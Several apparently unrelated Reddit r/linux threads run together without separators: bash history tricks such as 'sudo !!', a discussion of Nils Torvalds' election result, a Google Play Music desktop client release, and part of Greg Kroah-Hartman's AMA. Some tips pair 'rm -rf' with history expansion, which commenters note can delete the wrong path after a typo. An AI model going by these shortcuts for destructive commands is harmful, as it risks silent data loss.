    mkdir longDirectoryNameIDontWantToTypeAgain
    cd !$

I admit to using it with rm too, mostly from muscle memory (rather than design).


    ls longDirectoryNameIDontWantToTypeAgain
    rm -rf !$

Even though I **know** what I just typed, right after I press enter, it always occurs to me that I could have had a typo or something in my previous command. So.... probably best not to do that.
[deleted]
The last parameter of the last command is `$_`. 

The last parameter of the last command _in history_ is `!$`

https://unix.stackexchange.com/questions/271659/vs-last-argument-of-the-preceding-command-and-output-redirection

>     echo "hello" > /tmp/a.txt
> 
> the whole command `'echo "hello" > /tmp/a.txt'` appeared in history, and `/tmp/a.txt` is the last word of that command.
> 
> `_` is a shell parameter, it expands to last argument of previous command. Here, the redirection is not a part of arguments passed to the command, so only `hello` is the argument passed to `echo`. That's why `$_` expanded to hello.
A lot of people aren't aware you can set up vi/vim mode in bash.

Add this to your .bashrc:

`set -o vi`

Now you can do esc and do a lot of vim things inside bash, which can be helpful for people that use vim daily.
This is a command I used in college that other students weren't aware of. 

I also used "Ctrl + L" to clear the screen. The big advantage is that you can clear the screen in the middle of typing a command. Everyone was still erasing the line and typing "clear".

The other I picked up that's often useful is "Alt + ." 

There are some really cool tricks out there for the terminal.

Edit: typo
It seems this feature does not work with fish. On my system I can get it to operate as you describe on both zsh and bash, but not fish. Any thoughts? I do love me some fish, but this feature sounds very nice.
As cool as this is up arrow - ctrl-a - sudo -enter is my go to.
The cool thing about Linux is everyone has different experiences with it, different needs, etc. So you can always learn from others and teach.

One example was when I had my first job, I was actually working under my cousin (because you know, that seems to be the only way to get your first job nowadays) and while she'd used Linux quite a lot for work, I'd used it quite a lot for home use. We both learned things from eachother. I never really used tab complete til she got me in the habit of it, and she had no clue about !!, and would always use the up arrow, go all the way to the beginning and add 'sudo,' but this is something I taught her.

So in the end we both got to learn some useful time saving things! And I've used Linux for literally every job I've had, and results have been similar.
I just love this command, because when I explain it to some one I get to say "sudo bang bang". And that's precious.
I've learned the combination of UP (previous command), HOME (go to beginning of the line), 'sudo ' (add sudo before the command), ENTER.

It seems like roughly similar level of effort, but with added comfort of actually seeing entire command that sudo is going to apply to. On top of that it's deep enough in my muscle memory to not bother with !!.
And if you've made edits using vim but you don't have rights to write them, use

    :w !sudo tee %
It's also known as alias please.
Using linux for years. Didnt know it. So, possible.
I was doing some training for a security product and the trainer was using a Linux laptop at the time

I was gobsmacked when he used sudo !!, My entire world flipped upside down
[deleted]
What I do sometimes instead is:  
Up arrow, Home, "sudo "
You can also execute a command that you did using !x where x was the command history number. If you have ` 31 ls ` on your history list, executing `!31` is the same as executing ls.
I know about "sudo !!", but I never use this shortcut. In fact, I try to avoid any shortcuts when using tools like sudo or doas. It's too easy to shoot yourself in the foot. I much prefer using "Up, Ctrl+A" to return to the beginning of the previous line and prefixing "sudo". That way I can see the exact command I'm running before super-powering it with sudo.
I've known about it, but use Up+Pos1, enter sudo  and off I go. quicker for me and not context-dependent (better to customize, find, log,...)
I always use up arrow and then just type sude in front, but I think this is gonna save a lota time, thanks
always thought of the '!' in this case as making the sound of a courtroom gavel, so the !! gives you that iconic sound from law and order.

So when i type a command , and get the "you must be root" , i then use the 

*  Sudo !!

and think of it as me asserting my authority followed by the law and order sound
Holy *shit* you can do that?

!!
i know about it but i usually prefer to go up and correct the previous command, so my history isn't a bunch of invalid commands + a bunch of sudo !!
sudo is basically the only thing i know how to do without googling.
Never understand the point of `!!`, since I can just do `Up, Home, sudo`.
FYI: There's [more](https://ss64.com/bash/bang.html) than just `!!`.
Sometimes, It's fine to remember it exists. Thanks!
One I still haven't seen on here is pressing:

Esc + .

Pressing those two keys in sequence, at least in bash, will put the last argument of the previous command where the cursor is.

So if had just run:

    ls -la /home/blah/git

And then I had typed:

    rm -rf 

I can press escape then period and my command line will say:

    rm -rf /home/blah/git

This trick has saved me SO much time.
Should post this on /r/Linux4noobs as well!
To shorten things even more I've got this alias in my .bash\_profile

alias gah='sudo $(history -p \\!\\!)'
I thought I already knew the shortcut: press up, then left arrow to the beginning and type sudo[space] but this is a lot better, and I never learned it. Thanks.
Sudo bang bang is my favourite terminal command. It has saved me many many hours of moving a cursor back to the start of the line. 

Few others I like, up arrow key to bring up the last command, once you have done that you can use ctrl+R to search your history. 

I have also been playing with alias a bit lately, really nice for when you have a specific set of switches you like for something you do often. 
I have one that launches a docker container and mounts my current folder path to /opt in the container and drops me into a root shell. Great for when you need specific versions of tools and other bits. When I'm done I just blow it away and my local stays nice and clean.
I learned to hit up, home, then type sudo space enter before I learn about sudo !!

 I have a pok3r 3 layered keyboard, so I don't need to move my fingers to push the home button, it works pretty fast.
Well, you learn something new everyday. Thanks for the knowledge!
alias crap = 'sudo !!'
Once you typed something on the cmd line, using ctrl+a goes to the beginning, ctrl+e moves the cursor to the end and ctrl+w deletes single word.
Set alias ‘sudo !!’ To ‘fuck’
Now we’re cookin
Today I learned
`up, home, sudo, space` does the same thing with the same amount of keystrokes, but gives you the ability to actually see the command being input.  This is superior, in my opinion, than using !!.
This has to be the best thread I've ever seen on r/Linux. So many amazing thing that are obviously existing in retrospect. 

Thanks.
$ alias fuck="sudo !!"

Sadly, that doesn't work though. I'm sure it can be made to work with some shell magic, but I haven't managed to fix it yet.
>   I spoke to some other IT teachers afterwards and they too had not known about this command. 


Let me guess.  U.S. school.
While a nice trick i) I wouldn't want to rely upon this in non-interactive scripts and ii) interactively the keyboard shortcut C-p and C-a followed by typing sudo is faster than reaching for "!!" I feel.

To blow someone's mind in a way that would allow them to *define* these sort of tricks themselves, teach them about readline macros. Put the following in the ~/.inputrc and either restart bash or re-load readline config (C-x C-r):

`Meta-i: "\C-p\C-asudo \C-m"`

And the next time you press M-i, same thing will happen, except in only one keystroke.
It was something that I used often, I have moved to fish shell now though and while it's great it doesn't have this function.
I knew that because I read it from a reddit post , its extremely helpful
had no idea about it.
I did not know this, thank you :)
sometimes, i issued `history` then `!100` for the 100th item in the list
Ran across a video to explain it all. But I knew about this for some time.

[https://www.youtube.com/watch?v=Y\_6C-jowk8o](https://www.youtube.com/watch?v=Y_6C-jowk8o)
No I didn't know about it but now I do I'm going to use it as often as I can.
I know about it !!
Ha neat I never new that, thats pretty cool
There's also \^search\^replace which of course is handy for fixing a typo in the previous command. It replaces the first occurance of the search.

Example:

    $ sudo dng install vim
    $ ^g^f
I use "sudo !!" pretty much every day. I would lose my mind without it. I like that when using zsh it even prints out the full command with sudo before actually executing it.
I teach linux commands to my groups several days ago, and on `sudo` section I know I need to introduce them to `sudo !!`haha
`w o w`
I didn't. Thanks
Yeah, i just learned it a few weeks ago while watching AWS training. So many years wasted going back and adding sudo to the beginning of previous command.. 😒😄
I found out about `!!` when I was looking for a way to make an alias that executes the previous command as su. I never even made the alias, just developed muscle memory for `sudo !!` instead, so I don't have to deal with how bash replaces `!!` on the fly and how that wouldn't work properly in an alias like that.

I also use `!:0` a ton for my optipng queue that I made with aliases, especially if I'm browsing for fanart of a new character I saw and there's lots of people posting fanart as PNG files and I get too lazy to keep typing out `opti-add`
Duuuuuuude! Thank youuuuuuu! That beats the hell out of hitting the up arrow and then using your favorite method to navigate to the start of the command. I can't believe after all the linux basics and sys admin level books and videos I've viewed have not shown me the double bang trick. Sweeeeet!
Despite learning about !$ in one of my Linux admin classes a couple years ago I only learned !! a couple weeks ago! Love it.
That's surprising, bang bang is great. Do they not know ctrl a either?
I don't really need it. I know what requires superuser and what doesn't. Not like I try stuff at random. I might forget sometimes to type sudo, but seldom really.
It's surprising how many people do not know this. But OP your situation is next level... like what the hell...
!abc runs the last command that starts with abc.  Also pretty useful.
!! Is just previous input/command to shell.

Say you cat a file and it turns out to be really long. You can go !! | less. You can also go up arrow and add that. 

Common use case for me is I usually type a command to see the output and then wrap !! In my other action. I use fish shell modified where !! Will actually replace the string in real time though.
How many of my what?
Very informative posts.  Thanks guys.
I've been using Linux since the floppy days. I've never seen that !! command.
I've known sudo for as long as I've been using Linux. I did not know about the !! element. TIL. How does someone use the Linux terminal and not know sudo?
Love that command! Also: 

    $ history
    ...
    ...
    ...
    $ !123
Had no idea, been writing linux kernel modules for years.
!! is twice the Bang for your Buck.
Read the manual of the shell I use all day? How dare you
Sudo was one of the first things we learned in my Cloud Computing class when dealing with EC2s. 

I’m surprised they didn’t know it since it’s the only command I really remember from that class because we used it so much.
Don't everybody?
I love double pressing the escape key in zsh
I don't trust me or my servers enough to run something like that. Cool, though.
Knew about this super useful trick, but man there's a lot of gold in this thread I didn't know about as well.
i wish there was more control over the last command, for instance the last command sans the last argument or something
Learning the readline commands is even more efficient. Instead of remembering !! for this specific case I'll simply press ctrl+p ctrl+a to recall the previous line and go to the start. The nice thing is the line editing commands are always useful. You might realise you forgot sudo before pressing return, for example.

The same keys are used by emacs and other things too. You can even copy and paste with the keyboard alone.
yes, also pressing esc twice in zsh
I know about !!, but I refuse to use it. I want to see what I'm running, especially when I'm going to run something as root. With the edition capabilities of modern shells, showing the previous command, moving to the beginning and adding sudo takes about the same effort, and you get to see what you will run.
I've been using Linux for a long time and hadn't seen this before. Thanks!
I learned it just 3-4 days ago.
Make an alias 'please' to it! So every time you forget sudo you can just ask politely. ;-)
Also, !$ will pass the previous argument.

So, if you just did sudo systemctl status blah, you can then run sudo systemctl restart !$ and it will do the needful.
at one point i knew.... and apparently forgot.
Do you know if there is a way to do the same in fish?
yeah I've been using sudo ever since I started with Linux also su-
While I knew that such a thing was possible, I was not aware of the specific command. I’m definitely not a high efficiency Linux user.

I just “up arrow + home” and then add sudo.
One of my coworkers, a senior linux admin, never heard of shift+ins in a decade working with linux. Go figure
Woaaaahhh !!!
Those of us who read the "bash guide" and the o'reilly bash book.
People are wowed by 'sudo !!' but I don't understand why I would ever use it. It's not fewer keystrokes then 'C-p C-a sudo '  which does the exact same thing but sets you up for other more general editing.
It's hard to know when to introduce cli ux features in a classroom setting.  I also find that many teachers don't know much beyond what is in the curriculum.  "We won't teach it if it is not on the test."
i custom printed a t-shirt that says just that. it quickly became my most favourite t-shirt.
They were probably more confused about the "!!" Then the sudo
I did not know about that, cool, I can't wait to use it.

&#x200B;

As long as were passing around little tricks, did you know about !$ ?

>:\~$ touch xxx  
>  
>:\~$ rm !$  
>  
>rm xxx  
>  
>:\~$
Show them the XKCD Sudo comic
Me I know!! :)
I did not know this. Thanks
The '!!' made my day!

I always hit the up arrow to bring up the last command, hold ctrl and left to get back to the front.

Nice!
call me crazy but i don't trust myself to do it -- i just hit up arrow -> ctrl+a to get to the head of the line then type sudo. the idea of not exactly knowing what command i'm going to run -- especially as sudo scares me too much
Similar and possible unknown shortcut for those in fish shell:   
1. Move up one item in the history (up-arrow or ctrl+p)
2. Press Alt+s to prefix the command with sudo
I've known about it and been using it for years. I think I learned it when I switched from Fedora to Ubuntu many years ago. Definitely useful.
Tab to autocomplete. Few of my coworkers don’t use it when it could speed up their lives so much.
Yeah, it's fairly useful because I forget to sudo all the time.
You mean to say I might still be in ... ?
I learned about this a little while ago and now use it all the time, so handy!
me i did i use it pretty regularly especially when i run a command that needs to be sudo'd and i forgot to sudo it
New for me. I don’t use history as well as I should
Also !c where c is a character runs the last command starting with that character.
Every day is a school day.
alias fuck="sudo !!"
Interesting to know. Usefull not only for sudo. I don't use sudo. Blame me :D. My first distro was not Ubuntu.
Doesn't work in fish.
Did seem like magic the first time I saw this.
reading every comment to see if there are anything I've been missing out on, feeling conflicting emotions because I am proud of myself for already knowing everything I've found, but I'm also sad that I didn't learn any new neat tricks.
They should definitely had known about it but I'd also argue it's not the greatest practice to use all the time.
> ls /usr/share/doc/sane/LICENCE

> cat !$

> sudo sh -c "cowsay mkay\? >> !$"
This is also a sh/bash thing. Doesn't work in fish.
xkcd taught me sudo, and I've never used linux
I know it as sudo bang bang .. its the whizz
Sweet, thank you !!
I do!
yeah i know it, but it's less key presses to just hit up,home, and type sudo, so i never use it.
That’s just a bash thing. Try echo !!
I use fish, so no !!.


What I do is "Arrow up -> Esc -> 0 -> i -> sudo " with vi keybindings
I knew. It was propably the second command I learned
That's cool, but I think it's fewer keypresses to just press up, then home, then type sudo with a space after it before the original command.
Shamefully, TIL.
Thank you !!
This is the only use I can think of for !!. In most terminals "execute previous command" is just "<up><ret>", which is less keys than "!!<ret>". Also in zsh, you can do the whole "asdf<up><ret>" to run the most recent command starting with "asdf".
!!
Yip. Shell history expansions : http://tldp.org/LDP/GNU-Linux-Tools-Summary/html/x1712.htm

Also handy are positional parameters from : https://www.tldp.org/LDP/abs/html/internalvariables.html#PROCCID
This is indeed a nice trick. I've also used 'su -c "!!"' once or twice.
Its a mystery to me how this got so many upvotes.
So you are saying  https://github.com/nvbn/thefuck
Was unnecessary?
I probably use sudo !! more than actually putting sudo at the start of my commands.
I use it so often that it is in my muscle memory. When I switched from bash to mksh I missed being able to do sudo !! so I added this to my ~/.mkshrc to bring that old behavior back:

`alias sudo='sudo '`

`alias !!='$(fc -ln -1)'`

The first line allows sudo to be used with another alias (otherwise the !! would be interpreted literally). The second line calls the shell builtin `fc` and substitutes !! with the previous command.
How in the world does an IT teacher who is teaching a class involving Linux not know about 'sudo !!'?  Not criticizing but I find that odd...
Next tell them about ctrl+r. That one really blew my mind when I learnt it.
TIL
I didn't find out about this until after I was already proficient at typing [UP] [HOME] sudo [SPACE][ENTER]
I didn't lol. Thanks! I'm using it a lot now ;)
Yea I do. In fact I found out last night watching a video of Engineer-man on YouTube. It's Crazy finding new stuffs in the things we use in a day-to-day basis.
Learned this from the Ben Heck show Youtube channel a few years ago and I still use it. Very useful.
I did not know about "sudo !!", but I did know about both sudo and history expansion.
I used to use this in the bash shell. Now I use the fish shell and the features outweigh the expression.
So does pressing the up arrow button do the same? Because I do that to run the previous command.
Very handy, also useful is binding it to an alias like fuck :p
I use a function with bindkey to \[esc\]\[esc\]

`sudo-command-line() {`

`[[ -z $BUFFER ]] && zle up-history`

`if [[ $BUFFER == sudo\ * ]]; then`

`LBUFFER="${LBUFFER#sudo }"`

`elif [[ $BUFFER == $EDITOR\ * ]]; then`

`LBUFFER="${LBUFFER#$EDITOR }"`

`LBUFFER="sudoedit $LBUFFER"`

`elif [[ $BUFFER == sudoedit\ * ]]; then`

`LBUFFER="${LBUFFER#sudoedit }"`

`LBUFFER="$EDITOR $LBUFFER"`

`else`

`LBUFFER="sudo $LBUFFER"`

`fi`

`}`

`zle -N sudo-command-line`

`# Defined shortcut keys: [Esc] [Esc]`

`bindkey "\e\e" sudo-command-line`
Lots of people mentiong !line-number, but not mentioning that !pattern will run the last command you ran matching pattern.
*cries in ```fish```*
This and `$_` were game changers for my Bash usage.

E.g., `mkdir -p hello_world && cd $_`
This uses the history support in bash.  This is also supported in zsh and ksh.

You can also use "!number" to run the history entry for that number.  You can run the history command to see your last bash commands and which number they are.

You can use "!-number" to pick the command that many numbered entries ago. So for "sudo !!", the last command, you can also do "sudo !-1".

I see "sudo !-1" in a lot more places than "sudo !!".  I also see people using the EMACS-mode bash support for arrow keys to recall the last commands with up arrow. (h j k l work if you set vi mode in bash.)

The history feature for these shells is a huge topic on its own.  You will find history discussed in a class on scripting.  I would not be surprised to see basic or early Linux education lack significant emphasis on '!!' or other history shortcuts.

Support of "!!" isn't perfect on top of that.  Using chained commands with sudo may cause unexpected failures. In particular, any file redirection or pipes won't behave like you expect.  Lookup "sudo bash -c" examples for how to fix that.
I've known about it for years but I rarely use it because I either always forget or didn't forget sudo.
alt+a is another one I used frequently. It pulls the last object/item/word from your previous command
Wow I can't believe I did not realize this for after so long... I've known about !! but I'm like, what am I supposed to use this with when I can just press the up arrow to repeat the previous command.

My whole life is a lie /tableflip
Read the bash man page for tonnes of this type of thing

which lynx
!$

echo ls -l
!*


!-2:1

fls
^f

duck
^d^f
bang bang
Did you know that you can re-run any former command by simply typing !<first letters of command>? That is very useful as well.
`fuck`
This and much more "bang goodness" are well documented in the man page (probably one of the best man pages going IMHO) 

    man bash

Will tell you so much!
If you're not able to read your own distro's man page at the moment due to being AFK, here is one: https://linux.die.net/man/1/bash

A small excerpt relevant to your bang-bang command and variations !! 

----------------------------------------------------

Event Designators

An event designator is a reference to a command line entry in the history list.

!

Start a history substitution, except when followed by a blank, newline, carriage return, = or ( (when the extglob shell option is enabled using the shopt builtin).

!n

Refer to command line n.

!-n

Refer to the current command line minus n.

!!

Refer to the previous command. This is a synonym for '!-1'.

!string

Refer to the most recent command starting with string.!?string[?]Refer to the most recent command containing string. The trailing ? may be omitted if string is followed immediately by a newline.

^ string1 ^ string2 ^

Quick substitution. Repeat the last command, replacing string1 with string2. Equivalent to ''!!:s/string1/string2/'' (see Modifiers below).

!#

The entire command line typed so far.

----------------------------------------------------

You may want to read the next section about word Designators too.
i keep forgetting because there are places where using "!" wrecks my command.
Command line Kung Fu by Jason Cannon is a book that teaches many such shortcuts
ctrl + r allows for regex search in your command history, press it again to go to the next match in reverse chronological order, hit enter to run the current match or hit escape to exit the search but keep the match typed.
I've use the !* before, but just hit up arrow ctrl-a in that situation.  Just muscle memory now.

    # ls /opt/Xilinx
    # ls -ltr !*
Today I learned.
Why not just C-p C-a?
It's useful for other commands like `$ time !!` or redirection `$ echo $(!!) > out.put`

Also leveraging to tell about Bash shortcut Alt+. (dot). Inserts last command's last argument.

```$ ping a.very.complicated.argument.com```

```$ host <ALT+.>```
That's basically the only way I run sudo.
Not surprising that there are 10001 little bash-isms that people not extremely deep into scripting know about. It's like that for all technical things of sufficient complexity sadly.
This post and entire thread is so full of win! Been using command line for 20+ years but learning so many new useful things.
Nils Torvalds has been a politician for a while now, he was on the Helsinki city council for a few years before replacing a member of EU parliament. Last year the party he is a member of chose him as their presidential candidate. The president of Finland is largely a representative role, with relatively little power. The president can serve up to two 6-year terms, and the incumbent Sauli Niinistö is quite popular and expected to win. I haven't looked at the polls recently but I expect Torvalds will receive under 5% of the vote.

Torvalds is part of the Swedish-speaking minority of Finland (as is his whole family), and the party he is a member of, the Swedish People's Party, advocates for that minority, and is largely centrist on other issues (although "centrist" in Finland would be "somewhat to the right of Bernie Sanders" in the US). Torvalds' big issue is NATO membership, he's the only candidate (out of eight total) who strongly thinks that Finland should join NATO. The rest either strongly oppose or conditionally support the idea. So while Torvalds will certainly not win, by running he has started a larger discussion around NATO membership.

If you want to know more, ask away :)

Edit: lol, everyone knew that Torvalds was going to lose, but I don't think anyone thought he was going to lose this badly. With 75.8% of the votes counted, he got 1.4% of the total votes.

Edit 2: The final number for Torvalds is 1.5%, which is a crushing defeat even in a field of 8 candidates. The incumbent Sauli Niinistö won an overwhelming victory with 62.7% of the votes. This is the first time in the history of this iteration of the voting system (since 1988) that there will be no presidential runoff election.
Expect all those Linux-embedded Finnish voting machines will give elder Torvald's 99% of the vote.
> The final number for Torvalds is 1.5%

Roughly Linux user-share?
Here's another weird one for you Americans out there, [a map of Finland colored by which candidate won each municipality](https://i.imgur.com/KcfhixN.png).
Should be noted that while Finland is nominally a presidential democracy in practice it's a parliamentary one; the president has close to no actual powers which were all moved to the cabinet after Kekkonen got mad.
Here is [Nils Torvalds interviewed in Finnish television](https://areena.yle.fi/1-4297516) if you want to see the guy talking. There are also clips of the other candidates.
I'd like to say thank you for that headline. For some reason it feels like kinda the opposite of clickbait.
[Torvalds' pre-poll number was 1.2%.](https://yle.fi/uutiset/3-10045487)
What a pity he lost. I was looking forward to his inauguration rant.
> "centrist" in Finland would be "somewhat to the right of Bernie Sanders" 

you dont understand america politics.

centrist in finland is considered to be leftist insane in America

https://www.politicalcompass.org/uselection2016

Sanders is probably more right than centrist in finland
> ... (he is not expected to win)  ...
> With 75.8% of the votes counted, he got 1.4% of the total votes.  

So they really weren't ready for a benevolent dictator?


Questions: did Linus's fame in the tech role play any role in Nils' campaign?  Did Nils have some claim to fame by having Linus be his son, or does no one in Finland know who Linus is?  
Hey! That's almost as much as the linux market share!
TIL. Thank you for this concise and clear reporting.
Linux for president! 
> (although "centrist" in Finland would be "somewhat to the right of Bernie Sanders" in the US)

As it should be. By European standards, Sanders is centre-left and his ideology is social democracy.
> With 75.8% of the votes counted, he got 1.4% of the total votes

almost the same as the linux desktop market share, lmao
He also isn't a big fan of freedom of speech from what I've heard.
Freeland
This explains so much about Linus.
[removed]
There will be some serious public flaming of opponents if he wins.
I know another great man who wasn't supposed to win the presidency either. 
Welp. Finland = linux country. (At least the government will use linux and won't get WannaCry or Petya attacks)
I've heard that in Finland the candidates have been speaking about "after Sweden likely has joined NATO after the next election (this autumn)". In Sweden we haven't heard anything about joining NATO, though.
Isn't he basically a communist?
Wow, this could not be more irrelevant to Linux. Does this subreddit have no mods? 
"Finland"
I am a bot, and it doesn't have Flash built-in.
Join NATO, welcome Putin
As was designed, in the US, a declaration of war.
Original Post: https://www.reddit.com/r/Android/comments/492s9j/my_open_source_google_play_music_desktop_player/

Someone on the original thread said to X-post here when I released the linux builds.  Well 12 hours later and I am proud to release the linux builds.

I underestimated how many of you guys there are so I bowed to the pressure of the linux mob.

Have fun guys :)
I see on the github page that the homepage of the project is http://www.googleplaymusicdesktopplayer.com. I think this may lead to problems for you as due to how US trademark law works, trademark holders are required to assert control over their trademarks because if they don't, they might lose trademark status.

I would get another domain that doesn't include the name google if I were you, such as gpmdp.org, sooner rather than later to avoid a world of pain. Probably you should also rename the project to simply gpmdp.

I am not a lawyer. This is not legal advice.
I currently don't use Google Play Music, but I just wanted to say thank you for supporting the Linux community!
it already seems more stable than nuvola player. thanks for bringing this to my attention.
This is great and I'm downloading it now, but when did loading an entire browser window with some JS inside become "lightweight"? :(
That moment when you were working on a [project](https://github.com/96AA48/google-music-player) just like this and stopped on it because of lack of time, and see someone else finish it first ;(.
Gonna try to package it for debian. It will hit ubuntu eventually.

Anything I should be aware of? Specially regarding licensing.


I especially like the proper use of "peoples"
Totally unable to log in...I click sign in and it just sits there until I close and reopen the program. 
[deleted]
Chromecast support? 
Can someone get a PKGBUILD going for the AUR?
Thanks for this, I excitedly went to the site a few hours ago only to see that it would only work on my desktop.  Now, to the laptop it goes!  
Does it have MPRIS support?
Maybe it's a stupid/noob question but what is the point of a desktop client when there is a web player ?
Awesome. Have been using your player on my work desktop for a while, glad to get a client for my Linux laptop at home now.
This is  incredible. Now if only I could just try it. :) Clicking the Linux 64-bit link on your site just takes me to http://www.googleplaymusicdesktopplayer.com/#! where nothing happens. :( 

EDIT: In Chrome and Firefox. Disabled UBlock.
EDIT2: Found the package on your github!
Been tempted to give Google Play a shot, currently using Spotify.

Does anyone know if this client plays well with jackd (I need jackd for room correction and digital crossovers etc for my sound system), and whether there is a reasonable mpd compatible google play 'server'? Currently using mpd and mopidy.
I have been hoping for a working google play music client which works from the *command line*. I wonder if it is possible. It seems like this app just opens the full google music page.
JUst downloaded it, thanks!

My first thought when I saw this yesterday was how useful it would be on my box in the kitchen which pretty much is for music or videos when cooking or cleaning. Thanks for address us Linux users!

By the way, is Chomecast use available with it?
Question, I've wondered how security works on apps like this. I log into my google account through the app so could the app skim my info? *BTW, Not an accusation!* I'm very happy with this linux version -Thanks! I was just wondering how things like this are protected against in the programming world. 
[deleted]
This is awesome!
Wow this is great. 

Thx
That is one sexy looking music player.
I'll download once I get home from work. :o
This is great, thanks for the builds!

ps - the tray icon works :P
shame I don't use Google Play.  maybe Drive is next?
Are the Linux links broken? Clicking Mac or Windows loads the download but Linux just closes the download overlay.
Nice. I'll make a package for SteamOS and see how it fares under the compositor. 
I'm going to go ahead and make an AUR package for this.  Also there's some compatibility issues I'm having with i3, so I'm going to try to fix those as well.  I'll make a few github issues for them and send in a pull request.
nice! I think is in arch linux AUR already
I'll try my luck here too, since you probably haven't seen my comment on the other thread!

> Haven't really dove into your code, but scratching the surface, it looks like you're using Electron's frameless-window and implement your own window controls... Why don't you just use the native OS window controls instead of those custom buttons? Even if it looks good for the player itself, it makes your app stand-out in a weird way - it looks foreign on every OS. The controls are smaller than Windows', are on the wrong side on OS X, and won't blend in with whichever DE on Linux.

> Just my two cents, I've used your player more than once myself and I liked it. Simply one small pet peeve!

Thanks again for the client!
Not, we asked for Drive for Linux
Good stuff. I just started on Windows, but great to see you expanding. My one complaint with Google music was no desktop app, so this is wonderful. 
RPM

P

M
~~Is it just me or is the Linux-64 download link not working?~~ Now its working. 

Hmm .deb I guess I'll have to manually install it for my Arch system.

edit: and now i'm getting a last.fm API key error
An audio player, yet the repo stats say it’s implemented
in JS and HTML …‽ I might be missing something …
Thanks, I'll try it out when I get into the office on Monday! I particularly like the audio device selection, it simplifies the use of an external dac/amp setup.
Kind of off-topic, but how does Google play compare to deezer? 
Thank you so much, this is incredible!
I have not used Google Play Music since before Spotify was released. I recall having to upload my own music and then realized I should just use Spotify. What is the advantage of using Google Music?
Nice work. Running the 64bit version without any problems and the interface looks really pleasing.
You shouldn't call the builds linux 32/64 bit. deb packages are limited to only a couple of distros, debian and derivatives. Call the builds Debian/Ubuntu 32/64.
Gracias! I'll definitely download when I get to my desktop.
As someone using Linux since two days: how does this compare to Amarok or Banshee? As in functional differences.

I see I can't use it anyway right now since I use openSUSE, but maybe it'd be available in the future.
Don't have Linux on my current machine unfortunately :(, I did however install the Windows version and I have to say, job well done! Feels almost like an "official" version of GPM!

EDIT: I lied even on Windows this shit feels official. Job well done !
I'm having trouble compiling it from git, npm is giving me errors

    myspl33n@myspl33n-ThinkPad-T410:~/git/Google-Play-Music-Desktop-Player-UNOFFICIAL-$ npm run build

    > google-play-music-desktop-player@3.0.0 build /home/myspl33n/git/Google-Play-Music-Desktop-Player-UNOFFICIAL-
    > gulp build

    /usr/bin/env: node: No such file or directory
    npm ERR! weird error 127
    npm WARN This failure might be due to the use of legacy binary "node"
    npm WARN For further explanations, please read
    /usr/share/doc/nodejs/README.Debian
 
    npm ERR! not ok code 0

I'm not sure if you're aware of this or not, but I did see a reference to removing the Google Play Music extension to free up media keys.

It's actually possible to just disable the shortcuts in Chrome.  Just open the Menu -> More Tools -> Extensions, and scroll way to the bottom.  There's a link "Keyboard Shortcuts" (next to the link to the web store), and actually leads to an interface where you can assign (or delete) shortcuts for all extensions.
Hip hip hooray! Thanks for linux love
I use the web version of Google play music and have been wanting a desktop app for a long time! Thank you so much


I hate to use curse words on this otherwise lovely thread, but I have to ask. Is there a version of this available on a certain proprietary OS created by Microsoft? My "friend" has one or two non-Linux PCs that "he" uses for gaming, and wants to know if "he" can run it on those as well
Hey!! Good work man, but you could so that in a GTK+ or QT5 interface. Whatever, is very appreciated it
Does anyone know what font and color scheme [this](http://imgur.com/Kqsjstj) is on the website?
Awesome work dude!
This is AWESOME /u/marshallofsound. How difficult would it be to implement a similar idea for Amazon Music, or integrate it in?
Thanks OP!  This is great!
Actually I made an AUR package but it was a duplicate and not as good as the existing one.
I thank you very much! It looks awesome! 

However for osx, I've noticed that Radiant player consumes less power. Just a note to make for laptop users.
This is awesome! Thank you very much for thinking of the Linux community. All you need to do now is make a decent Google Drive application and we're set!
>stop listening to your favourite song because Chrome is guzzling up all your RAM..

This is literally a Chrome wrapper running your web app mate. Memory and CPU usage is just as disgraceful, if not worse.
[deleted]
Wow!! Thank you! I just made the switch from spotify (about two months ago) and was sad that there wasn't a desktop player. I was able to get a little desktop player but it required a webpage to be opened =(.

I am downloading now! Thanks again
Do you have a direct link for the 64 bit Linux download?
This isn't for "Linux" it's for "Ubuntu"(or at least just debian based). Can we get a universal tarball for other(ie better) distros?
Jesus fucking christ... No.. we asked for GOOGLE DRIVE.... 
GOOOOOOOOOOOOOOOOOOOOOOOOOOGLE 
DRIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIVVVVVVVVVVVVVVVVVEEEEEEEEEEEEEEE...


To refresh everyone's memory, I did this 5 years ago [here]
(https://www.reddit.com/r/linux/comments/2ny1lz/im_greg_kroahhartman_linux_kernel_developer_ama/)
and lots of those answers there are still the same today, so try to ask new
ones this time around.

To get the basics out of the way,
[this post](http://kroah.com/log/blog/2019/08/14/patch-workflow-with-mutt-2019/)  describes
my normal workflow that I use day to day as a Linux kernel maintainer and
reviewer of way too many patches.

Along with mutt and vim and git, software tools I use every day are Chrome and
Thunderbird (for some email accounts that mutt doesn't work well for) and the
excellent [vgrep](https://github.com/vrothberg/vgrep) for code searching.

For hardware I still rely on Filco 10-key-less keyboards for everyday use,
along with a new Logitech bluetooth trackball finally replacing my decades-old
wired one.  My main machine is a few years old Dell XPS 13 laptop, attached
when at home to an external monitor with a thunderbolt hub and I rely on a big,
beefy build server in "the cloud" for testing stable kernel patch submissions.

For a distro I use Arch on my laptop and for some tiny cloud instances I run
and manage for some minor tasks.  My build server runs Fedora and I have help
maintaining that at times as I am a horrible sysadmin.  For a desktop
environment I use Gnome, and here's a picture of my [normal desktop]
(https://i.imgur.com/g412C1E.png) while working on reviewing and modifying kernel
code.

With that out of the way, ask me your Linux kernel development questions or anything else!

Edit - Thanks everyone, after 2 weeks of this being open, I think it's time to close it down for now.  It's been fun, and remember, go update your kernel!
Why does the file transfer status bar race to the end and then wait, when using USB drives?

In simple terms please.
Thanks
The dev-genie grants you one (1) wish applicable to the Linux kernel.  What improvement, addition or fix do you wish for?
Hi Greg, I've sent you a few patch sets as a first-time contributor and I've really appreciated your patience as I learned the process.

How do you triage patches so quickly? I can send you a set of 7 patches and you'll know that #4 didn't compile but accept 1-3 and 7, and give me feedback on all the others. Then I get nice automated emails. Your workflow post kinda stops after you get the patches into a Git tree.

I've seen your [tools repository](https://github.com/gregkh/gregkh-linux) but of course it's not really intended for public consumption. I'd love to know more about it.
What made you switch to [terminology](https://www.enlightenment.org/about-terminology) from [efl/enlightenment](https://www.enlightenment.org/)?

Do you listen to music while programming? If so, what music? (I'm very interested in great minds music choices)
Got my 1st few patches into 5.6 and (unknown to me) it (apparently?) broke some ARM hardware.

